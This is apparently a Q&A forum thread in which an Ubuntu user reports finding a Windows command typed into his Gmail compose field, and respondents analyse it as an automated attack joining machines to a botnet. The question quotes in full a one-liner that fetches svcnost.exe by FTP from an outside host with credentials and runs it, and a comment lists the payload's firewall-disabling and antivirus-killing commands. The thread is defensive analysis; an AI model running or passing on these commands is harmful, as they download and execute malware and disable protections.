My home PC is usually on, but the monitor is off. This evening I came home from work and found what looks like a hack attempt: in my browser, my Gmail was open (that was me), but it was in compose mode with the following in the TO field:

md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo You got owned

This looks like Windows command line code to me, and the md start of the code combined with the fact that Gmail was in compose mode, makes it evident that someone tried to run a cmd command. I'm guess I was lucky that I don't in fact run Windows on this PC, but I have others that do. This is the first time ever that something like this has happened to me. I'm not a Linux guru, and I wasn't running any other programs apart from Firefox at the time.

I'm absolutely sure that I didn't write this, and nobody else was physically at my computer. Also, I have recently changed my Google password (and all my other passwords) to something like vMA8ogd7bv so I don't think that someone hacked my Google account.

What just happened? How does someone put keystrokes on my computer when it's not granny's old Windows machine that has been running malware for years, but a recent new Ubuntu install?

Let me address some of the points and questions:

  • I'm in Austria, in the countryside. My WLAN router runs WPA2/PSK and a medium-strong password that's not in the dictionary; would have to be brute-force and less than 50 meters from here; it's not likely that it got hacked.
  • I'm using a USB wired keyboard, so again very unlikely that anybody could be within range to hack it.
  • I wasn't using my computer at the time; it was just idling at home while I was at work. It's a monitor-mounted nettop PC, so I rarely turn it off.
  • The machine is only two months old, only runs Ubuntu, and I'm not using weird software or visiting weird sites. It's mainly Stack Exchange, Gmail, and newspapers. No games. Ubuntu is set to keep itself up to date.
  • I'm not aware of any VNC service running; I certainly haven't installed or enabled one. I've also not started any other servers. I'm unsure if any are running in Ubuntu by default?
  • I know all the IP addresses in Gmail's account activity. I'm fairly sure Google wasn't an entryway.
  • I found a Log File Viewer, but I don't know what to look for. Help?

What I really want to know is, and what really makes me feel unsafe, is: how can anyone from the Internet generate keystrokes on my machine? How can I prevent that without being all tinfoil-hat about it? I'm not a Linux geek, I'm a father who's messed with Windows for 20+ years and am tired of it. And in all the 18+ years of being online, I've never personally seen any hack attempt, so this is new to me.

  • 4
    Did anyone else have access to your computer, or do you have a very old wireless keyboard? Also, Ubuntu has a built-in VNC server. If that's active, a random script somewhere could have connected and assumed it was a windows computer, sending the keystrokes WIN+R, cmd......
    – TuxRug
    Commented Apr 20, 2011 at 19:32
  • 29
    @torbengb: Your post really scares me...
    – user541686
    Commented Apr 20, 2011 at 20:00
  • 9
    Are there any other computers on your wireless network? If the intruder broke their security it would give him an "in" to your local network, which could lead to cracking the Ubuntu box in various ways.
    – CarlF
    Commented Apr 20, 2011 at 20:28
  • 4
    @muntoo ... and 'm sure you haven't written that down anywhere and don't use any app to manage them either, right? Let's not begin password-bashing; at least my password isn't password :-) Commented Apr 21, 2011 at 8:39
  • 6
    Do you have a cat?
    – Zak
    Commented May 19, 2011 at 12:59

I doubt you have anything to worry about. It was more than likely a JavaScript attack that tried to do a drive by download. If you are concerned about this happening start using NoScript and AdBlock Plus Firefox Add-Ons.

Even visiting trustworthy sites you are not safe because they run JavaScript code from third-party advertisers that can be malicious.

I grabbed it and ran it in a VM. It installed mirc and this is the status log... http://pastebin.com/Mn85akMk

It is an automated attack that is trying to get you to download mIRC and join a botnet that will turn you into a spambot... It had my VM join and make a connection to a number of different remote addresses one of which is autoemail-119.west320.com.

Running it in Windows 7 I had to accept the UAC prompt and allow it access through the firewall.

There seems to be tons of reports of this exact command on other forums, and someone even says that a torrent file tried to execute it when it was finished downloading... I am not sure how that would be possible though.

I haven't used this myself, but it should be able to show you the current network connections so you can see if you are connected to something out of the norm: http://netactview.sourceforge.net/download.html

  • 10
    Er, why were all comments (even the highly highly relevant ones that discovered that the script attempted to open a cmd window) deleted!? Commented Aug 14, 2013 at 23:24
  • Would I be just as safe from this kind of attack if I just started using uBlock Origin? Commented Jan 30, 2017 at 15:15

I agree with @jb48394 that it's probably a JavaScript exploit, like everything else these days.

The fact that it tried to open a cmd window (see @torbengb's comment) and run a malicious command, rather than just downloading the trojan discreetly in the background, suggests that it exploits some vulnerability in Firefox which allows it to enter key-strokes, but not run code.

This also explains why this exploit, which was clearly written exclusively for Windows, would also work in Linux: Firefox runs JavaScript the same way in all OS'es (at least, it tries to :) ). If it were caused by a buffer-overflow or similar exploit meant for Windows, it would have just crashed the program.

As for where the JavaScript code came from - probably a malicious Google advert (ads cycle in Gmail throughout the day). It wouldn't be the first time.

  • 4
    Nice references.
    – kizzx2
    Commented Apr 21, 2011 at 11:30
  • 9
    FYI for skimmers, that last "link" is actually five separate links.
    – Pops
    Commented Apr 21, 2011 at 18:50
  • It would be quite shocking if it's really a Javascript exploit as my Firefox normally stays opened for days. However, you need to call special API to send keys to another system under Windows and probably a different system call (if exists) under Linux. Since sending keystrokes is not a normal Javascript operation, I doubt Firefox would implement a cross-platform call for that.
    – billc.cn
    Commented Jul 21, 2011 at 20:53
  • 1
    @billc.cn: I believe writing to the PS/2 keyboard buffer works the same regardless of operating system. Commented Jul 21, 2011 at 21:30

I found a similar attack on another Linux machine. It seems it's some kind of FTP command for Windows.

  • 8
    More precisely, it downloads and runs the file ftp://ccteam10:[email protected]/svcnost.exe using the Windows ftp command-line tool. Commented Apr 20, 2011 at 18:38
  • found it on pastebin too pastebin.com/FXwRpKH4
    – Shekhar
    Commented Apr 20, 2011 at 18:38
  • here is info about the site whois.domaintools.com/
    – Shekhar
    Commented Apr 20, 2011 at 18:43
  • 9
    It's a WinRAR SFX package containing a portable mIRC install and a file called "DriverUpdate.exe." DriverUpdate.exe executes (at least) two shell commands: netsh firewall set opmode disable and taskkill /F /IM VCSPAWN.EXE /T It also attempts (I think) to add die-freesms-seite.com to the Internet Explorer trusted zone and proxy bypass. Commented Apr 20, 2011 at 21:18

This doesn't answer your whole question, but in the log file look for failed logon attempts.

If there are more than about five failed attempts in your log, then somebody tried to crack root. If there is a successful attempt to logon to root while you were away from your computer, CHANGE YOUR PASSWORD IMMEDIATELY!! I mean RIGHT NOW! Preferably to something alphanumeric, and about 10 chars long.

With the messages that you got (the echo commands) this really sounds like some immature script kiddie. If it was a real hacker who know what he was doing, you probably still would not know about it.

  • 2
    I agree this was evidently very amateurish. At least they shouldn't have put echo you've been owned at the end. Makes me wonder if any "real hackers" ever got through? Or indeed I shoul perhaps be asking, how many? Commented Apr 21, 2011 at 8:43
  • 1
    @torgengb: if the command were run in a windows command prompt, you wouldn't see the echo (because of the &exit) Commented Apr 25, 2011 at 19:08

whois reports west320.com is owned by Microsoft.

UPnP and Vino (System -> Preferences -> Remote Desktop) combined with a weak Ubuntu password?

Did you use any nonstandard repositories?

DEF CON has a Wi-Fi competition each year as to how far away a Wi-Fi access point can be reached - the last I heard it was 250 miles.

If you really want to be scared, look at the screenshots of a command-n-control center of a Zeus botnet. No machine is safe, but Firefox on Linux is safer than the rest. Even better, if you run SELinux.

  • 1
    The author of this exploit clearly had no intention of running this on Linux, so I doubt it had anything to do with a vulnerable gnome utility or a weak password (also, OP already mentioned he has a secure password) Commented Apr 20, 2011 at 22:11
  • Actually, he does not mention having an Ubuntu password, just a gmail and wireless passphrase. A kid running metasploit may not even know about Linux, he just sees VNC. It is most likely a javascript attack.
    – rjt
    Commented Jun 17, 2012 at 4:21

